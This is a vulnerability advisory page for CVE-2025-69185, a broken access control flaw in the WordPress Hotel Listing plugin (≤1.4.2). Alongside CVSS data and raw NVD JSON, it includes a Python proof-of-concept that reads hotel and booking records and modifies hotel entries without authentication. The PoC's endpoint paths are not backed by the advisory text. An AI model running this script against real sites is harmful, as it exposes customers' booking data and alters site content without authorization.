Security Vulnerability Report
中文
CVE-2025-69185 CVSS 7.3 HIGH

CVE-2025-69185

Published: 2026-01-22 17:16:25
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in e-plugins Hotel Listing hotel-listing allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Hotel Listing: from n/a through <= 1.4.2.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Hotel Listing <= 1.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69185 PoC - Hotel Listing Plugin Broken Access Control # No authentication required import requests import json target = "http://target-site.com/wp-json" # PoC 1: Enumerate hotels without authorization def get_hotels(): endpoint = f"{target}/hotel-listing/v1/hotels" headers = { "Content-Type": "application/json" } # No auth token required - vulnerability response = requests.get(endpoint, headers=headers) if response.status_code == 200: print("[+] Successfully accessed hotel list without auth!") return response.json() return None # PoC 2: Modify hotel data without authorization def modify_hotel(hotel_id, new_data): endpoint = f"{target}/hotel-listing/v1/hotels/{hotel_id}" headers = { "Content-Type": "application/json", "X-WP-Nonce": "" # Empty nonce - no auth check } response = requests.post(endpoint, json=new_data, headers=headers) if response.status_code in [200, 201]: print(f"[+] Hotel {hotel_id} modified without authorization!") return True return False # PoC 3: Access booking records def get_bookings(): endpoint = f"{target}/hotel-listing/v1/bookings" response = requests.get(endpoint) if response.status_code == 200: print("[+] Booking records exposed without auth!") return response.json() return None # Execute PoC if __name__ == "__main__": print("CVE-2025-69185 - Hotel Listing Broken Access Control") get_hotels() get_bookings()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69185", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:25.120", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in e-plugins Hotel Listing hotel-listing allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Hotel Listing: from n/a through <= 1.4.2."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en e-plugins Hotel Listing hotel-listing permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Hotel Listing: desde n/a hasta &lt;= 1.4.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/hotel-listing/vulnerability/wordpress-hotel-listing-plugin-1-4-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}